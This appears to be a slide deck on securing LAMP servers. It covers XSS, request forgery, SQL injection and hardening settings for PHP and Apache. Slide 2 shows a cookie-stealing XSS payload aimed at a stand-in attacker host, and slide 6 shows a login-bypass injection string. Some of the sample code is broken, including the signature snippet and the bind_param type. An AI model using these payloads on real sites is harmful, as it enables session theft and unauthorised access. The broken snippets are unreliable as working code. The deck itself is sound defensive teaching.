LAMP security practices
- 1. LAMP Security Practices
XSS
Request Forgeries
SQL Injection
Disable PHP, Apache, OS information
Disable unnecessary modules
Log PHP errors
Disable/Limit file uploads
DoS attack
Remote Code execution
Disable dangerous PHP functions
Limit access to file system
- 2. XSS
A hacker posts the below given code snippet in
the comment section of website
http://exsite.com.
Hello Everyone!<script>document.write("<img
src="http://evilhacker.org/?" + document.cookie + "'>);</script>
The code will load as it is whenever I will open
the website http://exsite.com and will transfer
my cookie data to hacker's site
(http://evilhacker.org):-
Note that cookie data may have my login
credentials which you as a hacker can use to
- 3. XSS solution
All user submitted content should be filtered and
all the disallowed characters should be
removed
In particular <, >, and all html tags should be
stripped
- 4. Request Forgeries
Create, Update and Delete requests should be
ensured to have originally generated from your
application
Ex. Dont use url like
http://mysite.com/photos/delete/photo_id to
delete a photo. Instead use a signature url valid
for a predefined time. Check the below code:-
$_SESSION['signature'] = md5(unique(rand(), true) + $username);
$_SESSION['signature_timestamp'] = time()
echo “<a href='http://mysite.com/photos/delete/photo_id?signature
={$_SESSION['signature']}'>”
- 5. Request Forgeries
Create, Update and Delete requests should be
ensured to have originally generated from your
application
Ex. Dont use url like
http://mysite.com/photos/delete/photo_id to
delete a photo. Instead use a signature url valid
for a predefined time. Check the below code:-
$_SESSION['signature'] = md5(unique(rand(), true) + $username);
$_SESSION['signature_timestamp'] = time()
echo “<a href='http://mysite.com/photos/delete/photo_id?signature
={$_SESSION['signature']}'>”
- 6. SQL Injection
Ex. Input ' OR '1'='1 in userid field of login form. If
server script for authentication uses “ Select * FROM
tblusers WHERE userid = '$_GET['userid']' ”, this code will be
interpolated to “ Select * FROM tblusers WHERE userid = '' OR
'1'='1' ” which will result in valid records getting
returned from database.
- 7. SQL Injection Solution
Use mysqli_real_escape_string($_GET['userid']) for all
user supplied data
Use prepared statements:-
$statement = $connection->prepare( "SELECT * FROM tblusers
WHERE userid = ?" );
$statement->bind_param( "i", $_GET['userid'] );
$statement->execute();
- 8. Disable PHP information
Run the command :
curl -I http://mysite.com/
HTTP/1.1 200 OK
Date: Sat, 28 eApr 2012 09:48:55 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
The output shows that the sites runs on PHP and
the version of PHP as well
Disable the information by setting expose_php=off in
php.ini
- 9. Disable Server Information
Run the command :
curl -I http://mysite.com/
HTTP/1.1 200 OK
Date: Sat, 28 eApr 2012 09:48:55 GMT
Server: Apache/2.2.20 (Ubuntu)
The output shows Apache server, its version, and
OS Ubuntu information
Disable these information by setting
ServerSignature Off
ServerTokens Prod
in /etc/apache2/conf.d/security file for Ubuntu or in httpd.conf file
- 10. Disable unnecessary modules
Use php -m to check list of enabled modules
Disable modules like gd if not required
On Ubuntu, goto folder /etc/php5/conf.d
Run: sudo mv gd.{ini,disable} This will rename file gd.ini to
gd.disable and then the gd module will not be
loaded with php
- 11. Log PHP errors
Use following to hide PHP error messages to be
diaplayed to site users
display_errors = Off
Use following to log the PHP error messages into
a log file
log_errors = On
error_log = /var/log/httpd/php-error.log
For realtime monitoring of php error log use:-
tail -f /var/log/httpd/php-error.log
- 12. Disable File Uploads
If your site doesnt want file upload functionality,
remove it from php.ini :-
file_uploads = Off
If your site wants file upload functionality, set it to
only the required minimum value :-
file_upload = On
upload_max_size = 1M
- 13. DoS attack
To avoid script taking an infinite time and bringing
down the server, use following settings:-
max_execution_time = 30
max_input_time = 30
memory_limit = 40M
- 14. Remote Code Execution
Remote urls can be opened by PHP functions
like fopen, file_get_contents, include, require
These remote urls are many time causes of code
injection and data leakage when not filtered by
programmers carefully.
To restrict remote file opening:-
allow_url_fopen = Off
allow_url_include = Off
- 15. Disable Dangerous PHP functions
Use following directive to disable the php
functions that are very powerful, dangerous and
not normally required when PHP is running with
a web server :-
disable_functions = exec, passthru, shell_exec, system, proc_open, popen,
curl_exec, curl_multi_exec, parse_ini_file, show_source
- 16. Limit Access to File System
Use following to restrict PHP's access to parts of
file system:-
open_basedir="/var/www/html/"
The above will not allow PHP access to parts of
file system like /etc or /tmp etc.
- 17. Session file path
Session files must be saved away from the web
site folder. Use following to change session
files location:-
session.save_path="/var/lib/php/session"
upload_tmp_dir="/var/lib/php/upload"
- 18. Write protect conf and application
files
Use chattr +i command to write protect any file
chattr +i /etc/php5/php.ini
chattr +i /etc/mysql/my.cnf
chattr +i /etc/apache2/apache2.conf
chattr +i /var/www/html/
Such files then can not be modified even by root
user.
Use chattr -i command to revert back the write
protection
- 19. Refrences
http://php.net/manual/en/security.php
http://developer.yahoo.com/security
http://www.phpfreaks.com/tutorial/php-security
http://phpsec.org/php-security-guide.pdf
http://www.cyberciti.biz/tips/php-security-best-practices-tutorial.html